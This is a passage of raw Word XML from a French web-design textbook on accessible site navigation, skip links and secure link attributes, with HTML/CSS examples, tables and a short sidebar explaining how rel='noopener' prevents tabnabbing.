        <w:t xml:space="preserve">La navigation est la carte du site. Elle doit rester stable d'une page à l'autre, indiquer où l'on se trouve et rester utilisable au clavier comme au doigt. Elle repose sur un élément </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nav</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contenant une liste de liens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une navigation balisée, avec la page courante indiquée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&lt;nav aria-label="Navigation principale"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;ul&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="/" aria-current="page"&gt;Accueil&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="/cours/"&gt;Cours&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="/ressources/"&gt;Ressources&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;li&gt;&lt;a href="/contact/"&gt;Contact&lt;/a&gt;&lt;/li&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;/ul&gt;</w:t>
        <w:br/>
        <w:t>&lt;/nav&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-current="page"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> signale la page active. Les lecteurs d'écran l'annoncent, et le CSS peut la styler sans ajouter de classe :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Styler la page courante à partir de son état sémantique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[aria-current="page"] {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-weight: 700;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  text-decoration: none;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-bottom: 3px solid currentColor;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.17 — Cinq dispositifs de navigation complémentaires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64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Élément de navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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310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Bonne pratique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Menu principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accès aux grandes sections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cinq à sept entrées maximum</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="264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Fil d'Ariane</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Situation dans la hiérarchie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="310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Liens, sauf le dernier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Menu de pied de page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Liens secondaires et légaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Organisé en colonnes titrées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="264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Lien d'évitement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Sauter la navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="310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Premier élément focusable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2642"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pagination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Parcours d'une liste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3108"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Numéros et précédent/suivant</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2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>LE LIEN D'ÉVITEMENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un lien d'évitement permet à un utilisateur au clavier de sauter la navigation répétée sur chaque page. Il est invisible au repos, mais apparaît au premier appui sur Tab. C'est l'un des gains d'accessibilité les plus simples à mettre en œuvre.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un lien d'évitement accessible et discret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.skip-link {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  position: absolute;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  left: -9999px;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:t>.skip-link:focus {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  left: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  top: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: .75rem 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: #fff;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 Liens externes, téléchargements et contacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un lien sortant mérite d'être signalé. Deux approches coexistent : ajouter une icône ou une mention textuelle, ou ouvrir dans un nouvel onglet. Cette seconde option doit rester rare : elle prive l'utilisateur du bouton « Retour » et perturbe la navigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Téléchargement explicite et lien externe sécurisé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&lt;a href="https://example.com/rapport.pdf"</w:t>
        <w:br/>
        <w:t xml:space="preserve">   download="rapport-2026.pdf"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Télécharger le rapport (PDF, 2,4 Mo)</w:t>
        <w:br/>
        <w:t>&lt;/a&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;a href="https://example.com" target="_blank" rel="noopener noreferrer"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  Site partenaire &lt;span class="visually-hidden"&gt;(nouvel onglet)&lt;/span&gt;</w:t>
        <w:br/>
        <w:t>&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attribut </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>download</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suggère un téléchargement plutôt qu'une navigation ; il ne fonctionne que pour les ressources de même origine, par sécurité. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rel="noopener"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche la page ouverte de manipuler la page d'origine via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>window.opener</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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TABNABBING</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Attaque où une page ouverte dans un nouvel onglet remplace le contenu de l'onglet d'origine par une fausse page de connexion. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>rel="noopener"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> la neutralise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.18 — Six attributs de lien et leur usage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33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Attribut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Recommandation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2331"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>href</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3419"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Obligatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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target="_blank"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Nouvel onglet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Toujours avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rel=noopener</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2331"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>rel="nofollow"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3419"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ne pas suivre pour le référencement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenus sponsorisés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Télécharger au lieu de naviguer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Même origine uniquement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2331"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>hreflang</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3419"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Langue de la cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3264"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sites multilingues</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="233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aria-label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Nom accessible du lien</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="326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Libellés ambigus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
